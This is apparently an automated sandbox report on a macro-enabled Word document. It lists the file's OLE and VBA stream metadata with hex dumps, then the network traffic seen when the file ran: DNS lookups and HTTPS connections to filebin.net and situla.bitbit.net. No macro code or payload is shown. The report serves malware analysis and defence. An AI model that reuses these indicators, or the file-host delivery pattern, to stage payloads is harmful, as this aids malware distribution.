                                                                  Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                  Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                  Stream Path: Data, File Type: data, Stream Size: 32978
                                                                  General
                                                                  Stream Path:Data
                                                                  File Type:data
                                                                  Stream Size:32978
                                                                  Entropy:7.70790581307
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . C . . . " . . . . A . . . . . . . . . . . . . . . . . . . . . . t . h . a . i . . . . . . . . . . . . . . . b . . . 8 . . . . . . d . . A . . . a , . . m S . ? . . . . . . . . . . D . . . . . . . . n . . . . . . . d . . A . . . a , . . m S . ? . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . s R G B
                                                                  Data Raw:d2 80 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 96 19 47 0e e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 46 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 22 00 00 00 04 41 01 00 00 00 05 c1 0a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 68 00
                                                                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367
                                                                  General
                                                                  Stream Path:Macros/PROJECT
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Stream Size:367
                                                                  Entropy:5.30381145663
                                                                  Base64 Encoded:True
                                                                  Data ASCII:I D = " { 0 6 2 5 E 4 4 A - E 7 6 5 - 4 1 C E - 9 D F D - C 3 4 7 3 6 B 7 5 A 4 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 3 C 1 2 6 B 2 3 E B 6 3 E B 6 3 E B 6 3 E B 6 " . . D P B = " D 7 D 5 3 2 A E 5 2 D 6 6 7 D 7 6 7 D 7 6 7 " . . G C = " E B E 9 0 E D A 2 3 D B 2 3 D B D C " . . . . [ H o s t E x t e n d e r I n f o ]
                                                                  Data Raw:49 44 3d 22 7b 30 36 32 35 45 34 34 41 2d 45 37 36 35 2d 34 31 43 45 2d 39 44 46 44 2d 43 33 34 37 33 36 42 37 35 41 34 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                                  General
                                                                  Stream Path:Macros/PROJECTwm
                                                                  File Type:data
                                                                  Stream Size:41
                                                                  Entropy:3.07738448508
                                                                  Base64 Encoded:False
                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                  Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2435
                                                                  General
                                                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                                                  File Type:data
                                                                  Stream Size:2435
                                                                  Entropy:3.97570851109
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                  Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                  Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
                                                                  General
                                                                  Stream Path:Macros/VBA/dir
                                                                  File Type:data
                                                                  Stream Size:513
                                                                  Entropy:6.23760719085
                                                                  Base64 Encoded:True
                                                                  Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . u a \\ d . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . r . m . .
                                                                  Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 75 61 5c 64 0b 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                  Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                                  General
                                                                  Stream Path:WordDocument
                                                                  File Type:data
                                                                  Stream Size:4096
                                                                  Entropy:1.08065186697
                                                                  Base64 Encoded:False
                                                                  Data ASCII:. . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j D . D . . . . . . . . . . . . . . . . . . . . . . . . . . . & v S h & v S h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                  Data Raw:ec a5 c1 00 2d 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 44 1c 44 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 26 76 53 68 26 76 53 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 20, 2022 09:18:54.811676979 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:54.811722994 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:54.811779022 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:54.816365957 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:54.816391945 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:54.923983097 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:54.924114943 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:54.933249950 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:54.933269024 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:54.933573008 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:55.139383078 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:55.278825998 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:55.322189093 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:55.339699984 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:55.339776993 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:55.339869022 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:55.354721069 CEST49173443192.168.2.22185.47.40.36
                                                                  Apr 20, 2022 09:18:55.354753017 CEST44349173185.47.40.36192.168.2.22
                                                                  Apr 20, 2022 09:18:55.506489992 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.506531000 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.506872892 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.507960081 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.507970095 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.731769085 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.731873989 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.740710974 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.740725040 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.741158962 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.756040096 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.798182964 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.807862997 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.853785038 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.853846073 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.853986979 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854008913 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.854023933 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.854063034 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.854067087 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854093075 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.854103088 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854110003 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.854116917 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854135990 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854147911 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854275942 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.854629040 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.899869919 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.899888992 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.899919987 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.899954081 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.899966002 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.899982929 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900031090 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900063038 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900082111 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900088072 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900104046 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900257111 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900286913 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900321007 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900327921 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.900341988 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.900382042 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946157932 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946217060 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946270943 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946284056 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946296930 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946331978 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946362972 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946388006 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946394920 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946407080 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946578979 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946609020 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946611881 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946624041 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946633101 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946655035 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946814060 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946845055 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946863890 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.946870089 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.946892977 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947037935 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947072029 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947097063 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947105885 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947125912 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947277069 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947308064 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947338104 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947361946 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947463989 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947468996 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947501898 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947534084 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947551966 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.947559118 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.947577953 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.950661898 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.951575994 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993635893 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993679047 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993740082 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993758917 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993771076 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993829012 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993866920 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993887901 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993899107 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.993911028 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.993933916 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994090080 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994134903 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994143009 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994178057 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994187117 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994198084 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994349003 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994393110 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994410038 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994422913 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994443893 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994580984 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994622946 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994656086 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994668961 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994678974 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994808912 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994851112 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.994865894 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.994909048 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995203018 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995213985 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995292902 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995372057 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995409012 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995440006 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995450020 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995461941 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995479107 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995512962 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995534897 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.995543957 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.995556116 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.999298096 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:55.999955893 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089478970 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089519978 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089587927 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089618921 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089667082 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089668036 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089689016 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089703083 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089705944 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089730978 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089756012 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089765072 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089828968 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089859009 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089890957 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089900017 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089910030 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089920998 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089951038 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.089983940 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.089996099 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090008974 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090012074 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090044975 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090090036 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090099096 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090110064 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090114117 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090143919 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090193033 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090204954 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090214014 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090219021 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090250015 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090276003 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090285063 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090298891 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090301037 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090333939 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090358019 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090368032 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090379000 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.090399027 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.090445042 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.097667933 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107212067 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107250929 CEST4434917487.238.33.8192.168.2.22
                                                                  Apr 20, 2022 09:18:56.107265949 CEST49174443192.168.2.2287.238.33.8
                                                                  Apr 20, 2022 09:18:56.107275963 CEST4434917487.238.33.8192.168.2.22

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 20, 2022 09:18:54.702529907 CEST5586853192.168.2.228.8.8.8
                                                                  Apr 20, 2022 09:18:54.721021891 CEST53558688.8.8.8192.168.2.22
                                                                  Apr 20, 2022 09:18:54.721606016 CEST5586853192.168.2.228.8.8.8
                                                                  Apr 20, 2022 09:18:54.742054939 CEST53558688.8.8.8192.168.2.22
                                                                  Apr 20, 2022 09:18:54.790144920 CEST4968853192.168.2.228.8.8.8
                                                                  Apr 20, 2022 09:18:54.810780048 CEST53496888.8.8.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.363713026 CEST5883653192.168.2.228.8.8.8
                                                                  Apr 20, 2022 09:18:55.417620897 CEST53588368.8.8.8192.168.2.22
                                                                  Apr 20, 2022 09:18:55.451881886 CEST5013453192.168.2.228.8.8.8
                                                                  Apr 20, 2022 09:18:55.504235029 CEST53501348.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 20, 2022 09:18:54.702529907 CEST192.168.2.228.8.8.80xce22Standard query (0)filebin.netA (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:54.721606016 CEST192.168.2.228.8.8.80xce22Standard query (0)filebin.netA (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:54.790144920 CEST192.168.2.228.8.8.80x8e74Standard query (0)filebin.netA (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:55.363713026 CEST192.168.2.228.8.8.80x5d20Standard query (0)situla.bitbit.netA (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:55.451881886 CEST192.168.2.228.8.8.80x7edStandard query (0)situla.bitbit.netA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Apr 20, 2022 09:18:54.721021891 CEST8.8.8.8192.168.2.220xce22No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:54.742054939 CEST8.8.8.8192.168.2.220xce22No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:54.810780048 CEST8.8.8.8192.168.2.220x8e74No error (0)filebin.net185.47.40.36A (IP address)IN (0x0001)
                                                                  Apr 20, 2022 09:18:55.417620897 CEST8.8.8.8192.168.2.220x5d20No error (0)situla.bitbit.net87.238.33.8A (IP address)IN (0x0001)
